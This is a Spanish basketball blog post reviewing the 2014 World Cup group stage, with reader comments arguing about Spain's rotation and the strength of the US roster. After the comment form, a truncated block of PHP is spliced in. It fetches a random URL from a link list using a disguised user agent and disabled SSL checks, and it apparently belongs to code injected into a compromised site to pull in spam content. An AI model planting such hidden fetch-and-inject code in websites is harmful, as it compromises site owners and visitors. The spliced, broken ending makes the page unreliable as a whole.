Mundobasket 2014: Llegan los cruces

05 de September de 2014 por TheDeerHunter

Se acabó la primera fase. A partir de ahora los partidos serán a cara y cruz y no habrá oportunidades de remediar posibles despistes. Le echamos un repaso a lo que han dado de sí estos primeros días de competición:

Grupo A

Sin sorpresas. España ha avasallado pero ha dejado algunas sensaciones extrañas respecto a su segunda unidad y su dirección técnica. Brasil, a pesar de la debacle contra los locales, se postula como candidata clara al podio. Francia ha estado bastante bien a pesar de las bajas y Serbia pasa el corte pero transmitiendo excesiva inseguridad. Irán y Egipto muy flojos.

Los mejores NBA del grupo han sido Pau Gasol, Marc Gasol y Ricky Rubio por parte de España, Anderson Varejao por parte de Brasil y Miroslav Raduljica por Serbia. El resto no han brillado como esperábamos. 

Grupo B

Grecia no ha mostrado fisuras dominando un grupo tremendamente igualado. Le acompañan Croacia, Argentina, más la gran sorpresa Senegal que ha dejado en la cuneta a los puertorriqueños. Todos han logrado victorias, incluido Filipinas. Queda la duda de si se trataba de un grupo excesivamente mediocre. Lo determinaremos en los cruces.

Excelentes los NBAs de este grupo. JJ Barea y Andray Blatche se marchan del mundial siendo el máximo anotador y el máximoreboteador respectivamente. Gorgui Dieng ha dado la campanada liderando su selección y la tabla de eficiencia hasta la fecha. En esa clasificación le ha seguido muy de cerca Luis Scola que está cuajando un campeonato de ensueño. Giannis Antetokounmpo, Pablo Prigioni y Bojan Bogdanovic también han sido claves en sus selecciones.

Grupo C

Nos cubrimos de gloria clasificando prematuramente a Ukrania y dando por muertos a los “Tall Blacks”. Los neozelandeses sorprendieron a los primeros en su enfrentamiento directo y en una última jornada de infarto doblegaron a los finlandeses mientras que Ukrania debía bailar con los intratables EEUU. El triple empate con República Dominicana (los tres equipos en negativo) penalizaba al equipo de Fratello. Turquía ha terminado segunda y Finlandia ha decepcionado a pesar de su numerosa hinchada.

Kenneth Faried es una de las revelaciones del campeonato y ha terminado siendo el mejor de su selección. No hubiéramos apostado porque se adaptara tan bien al baloncesto FIBA. Con Anthony Davis forman la pareja interior más física del campeonato. James Harden, Demarcus Cousins, Kyrie Irving, Stephen Curry y Klay Thompson están cumpliendo. Por Turquía Omer Asik finalmente ha espabilado y ha aportado la solidez necesaria a su selección. Francisco García ha sido el líder indiscutible de los dominicanos y uno de los mejores jugadores de esta fase.

Grupo D

Mucha polémica al final. Australia, de manera muy hábil, evitaba el hipotético cruce con USA al perder de forma sospechosa ante Angola (reservaron tanto a Joe Ingles como a Aaron Baynes). Los eslovenos se desquiciaron para terminar perdiendo la imbatibilidad y el liderato de grupo ante Lituania debido a una remontada asombrosa. Dragic y los suyos serán víctimas propiciatorias de los norteamericanos si es que superan el primer cruce. México se enfrentará a USA como premio a su clasificación. Los koreanos abandonan el mundial perdiendo sus 5 partidos pero dejando mejores sensaciones de las esperadas.

Goran Dragic estropeó su buen hacer en la última jornada aunque eso no quita lo bien que ha jugado habitualmente. Al final Jonas Valanciunas y Donatas Motiejunas han terminado maquillando su actuación en esta fase. De Australia nos quedamos con el extraordinario campeonato de Aaron Baynes y de México de Gustavo Ayón.

Emparejamientos

Rep. Dominicana – Eslovenia vs USA – Mexico

Vs

Nueva Zelanda – Lituania vs Turquía – Australia

VS

Francia – Croacia vs España – Senegal

Vs

Serbia – Grecia vs Brasil – Argentina

Comenta

11 comentarios a esta entrada

  1. nba dice:
    #1

    O Orenga pone hoy a Ibaka-Claver-Felipe al menos 15 minutos cada uno o se puede despedir de que les llegue la gasolina a los Gasol para la final.
    Q pinta Calderon jugando de escolta en vez de ocupar ese puesto Lull .
    En fin, menos mal que tanto Navarro como Rudy estan entonandos , que sino con esta rotación USA nos va a masacrar en el perimetro

      Citar

  2. Nacho dice:
    #2

    nba:
    O Orenga pone hoy a Ibaka-Claver-Felipe al menos 15 minutos cada uno o se puede despedir de que les llegue la gasolina a los Gasol para la final.
    Q pinta Calderon jugando de escolta en vez de ocupar ese puesto Lull .
    En fin, menos mal que tanto Navarro como Rudy estan entonandos , que sino con esta rotación USA nos va a masacrar en el perimetro

    Y los descansos de Ricky, que son cuando toca y no cuando está follao…
    ¡Tantas Orengadas!
    Calderón juega de escolta porque a él no lo puede marginar como a Felipe, Abrines y Claver. Si no, la rotación sería de 8 tíos.
    No es ya que jueguen los interiores, como dices. si no que cuando esté en cancha también se juegue para Ibaka. Y menos mal que es él, llega a ser otro tío y empieza a desenchufarse a la voz de ya. Pero Serge es motivación pura.
    Los amantes del juego en Europa siempre se meten con la NBA y el tema de las rotaciones. Pero este tipo es más cuadriculado que cualquier coach de allí (que por cierto han pegado un cambio en los últimos años y no son tan cuadriculados como antes.
    El quinteto titular juega 10 minutos. Salvo un tiempo muerto que haya dentro del último minuto y medio del cuarto, en el que ¡a lo mejor! cambia al base y a un interior o ala.
    el segundo cuarto empieza con nuevo base, y Rudy y Marc fuera un día y otro Pau y Navarro. Los que se quedan juegan 14 minutos seguidos. Mientras tanto, Ibaka ni las huele cuando está en pista. Llul sí, y Calde depende de lo que toque. En el segundo cuarto escolta. Poco a poco van terminando los titulares y según el día del chacho juega todo el cuarto, o no. Es el único cambio en las rotaciones en cuanto a rendimiento.
    Y lo penoso de todo esto, es que ha sido en fase de grupos donde no ha habido rival. ¡Qué hará en eliminatorias!
    Me veo un repaso de los EEUU de cuidado. Solo hay tres factores que pueden jugar a nuestro favor:
    La motivación, que va a estar seguro.
    Que todos estén enchufados ese día…
    Y que milagrosamente no se cansen.
    Porque si tenemos que esperar algo del cuerpo técnico “aviaos” vamos.

      Citar

  3. denise dice:
    #3

    Pero si eeuu no juega a absolutamente nada!! Estan ganando los partidos por inercia pero eso vs españa no les servira. Por otra parte, considero mas meritorio las platas olimpicas de 2008 y 2012 que un hipotetico oro frente a esta seleccion C de USA

      Citar

  4. TheDeerHunter dice:
    #4

    denise:
    Pero si eeuu no juega a absolutamente nada!! Estan ganando los partidos por inercia pero eso vs españa no les servira. Por otra parte, considero mas meritorio las platas olimpicas de 2008 y 2012 que un hipotetico oro frente a esta seleccion C de USA

    Selección C? En serio Denise??
    ¿Y cual es la B?

      Citar

  5. Denise dice:
    #5

    Algunos de los que están serían B pero la mitad serían C ó ni eso.

    Selección A: Paul – Westbrook – CURRY – Wade – Lebron – Melo – Durant – Griffin – Love – Bosh – Duncan – Aldridge

    Selección B: Wall – Lillard – Bledsoe/Rondo – HARDEN – Stephenson – Leonard – Iguodala – George DAVIS – Al Jefferson – Randolph – COUSINS – Howard –

    Sólo 4 tios del actual equipo estadounidense los metería entre los 24 primeros, no obstante USA tiene tal pléyade de jugadores buenos que los que han ido a la selección ni que decir tiene que son buenos pero la selección americana no es ni la mitad de buena de lo que podrían haber llevado.De los que no incluyo:
    – Gay y de Rozan son chupones del tres al cuarto, con haber llevado solo a uno o ninguno tenían bastante.
    – Drummond: Dentro de 2 años será el mejor pivot de la NBA, pero tiene poca experiencia en grandes citas y no ha jugado ni partidos de Playoffs (tampoco creo que lo han hecho ni Davis ni Cousins)
    – Plumlee: Es una broma???? Nepotismo de Coach K supongo….
    – Irving: Gran jugador, podría estar en mi selección B pero creo que hay mejores opciones también en el PG
    – Rose: ¿De verdad hacía falta que fuese a este evento? Lo que estamos viendo es una caricatura de aquel jugador de Chicago. Es comprensible tras año y pico lesionado, pero mejor se hubiese quedado en casa.
    – Faried: Está siendo el mejor del equipo y la apuesta por el de los Nuggets les está saliendo fenomenal. Pero seamos serios…hay mejores que él ya ni siquiera entre mi selección A y B (Josh Smith, David Lee, Millsap)
    – Klay Thompson: Va fenomenal para el rol de metralleta, para otro rol, hay mejores opciones.

    Repito, no quiero decir que la selección USA sea una mierda, simplemente entre los mejores que podrían ir a los que han ido …hay una gran diferencia que va desde poder ganar de paliza a España (selección A), ganarle con relativa comodidad (B), a tener que sufrir ante ellos, porque creo que la final va a estar bastante igualada.

      Citar

  6. Denise dice:
    #6

    Se me ha cortao….
    En definitiva, si EEUU es capaz de ganar y aplastar a los españoles (alguno de ellos están muy subiditos por cierto) será un gran triunfo del basket americano y un motivo de la NBA para sacar pecho y llenarse de orgullo.
    Hay que recordar que los españoles llevan años y años jugando juntos y juegan de memoria, mientras los americanos vienen cada uno de su padre y de su madre, por tanto, para mí, en cuanto imagen, en la derrota tiene más que perder el baloncesto español (y por extensión el europeo) que la propia NBA y la federación USA de basket, porque si con el plantillón que tiene España y un equipo tan conjuntado no es capaz de ganar a esta mediana selección americana, no sé yo cuando otro equipo europeo lo va a hacer….

      Citar

  7. TheDeerHunter dice:
    #7

    Wade no está ahora mismo al nivel de Harden como tampoco de DeRozan.
    Rose en condiciones normales debería de haber estado por delante de Cris Paul o Westbrook, aunque estoy de acuerdo con que no debería de haber ido. La otra opción, Lillard, ya empieza a mirarle a la cara a cualquiera.
    Bosh ni naciendo 14 veces estaría por delante de Davis, ni tampoco de Cousins… Te admitiría a Howard por delante de éste.

    3, 4 nombres están para entrar en la selección A sin mucho esfuerzo. 3 o 4 más en la B. Al final serán los que decidirán el campeonato.

      Citar

  8. nba dice:
    #8

    Se veia venir, Pau parece que ya esta con problemas fisicos, a pesar de las vacaciones que se ha pegado.
    Tengo ciertas dudas de que con los Bulls sea capaz de mantener la titularidad en detrimento de Gibson u otros.

      Citar

  9. Denise dice:
    #9

    Deer.. ..lo de las 14 veces de Bosh no estoy nada de acuerdo, pero bueno eso es otro tema. Yo para este evento pondria a Bosh por delante porque ha jugado 4 finales y mas de 50 partidos importabtes en su carrera. Davis y Cousins ni siquiera han jugado PO..y ese es el problema que le veo a los eeuu, la falta de experiencia de sus jugadores cuando la cosa vaya mal y esten a remolque. Creo ke algunos de ellos igual no han adquirido aun esa capacidad de sufrir y la templanza y calma necesaria para no sentirse presionados y que le queme el balon en las manos.

      Citar

  10. Txusma dice:
    #10

    A Davis y Faried los desactivas del todo con una zona pero claro eso deja a Curry, Thompson y Harden bastante libres en el perímetro donde son los 3 unos artistas.
    No sé si Rose debería haber jugado este mundial. Ahora mismo está muy mal, pero muy mal. Verlo en directo ante Mexico me ha hecho hasta daño. Lo intentó apenas en 3 ocasiones y no le salió nada. Al final simplemente subía la bola y en cuanto la daba se iba a una esquinita a no estorbar demasiado. Jugaba sin ningún tipo de tensión y en defensa se le iba el base suplente de los mexicanos… Un desastre. Eso sí, el resto lo mimaban bastante. Saben que no pasa por su mejor momento ni de lejos. Espero que acabe de afinarse en lo que qda antes de q empiece la temporada sobretodo a nivel mental.

      Citar

  11. Txusma dice:
    #11

    Y oye, Mason Plumlee jugó 6 minutillos pero ejerció de Faried y para mi gusto con éxito. Este tio se va a pegar con quien se ponga por delante y va a ir a muerte a por cualquier balón que sobrevuele la zona. Algo que no estoy seguro si puedo decir de Drummond, por ejemplo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>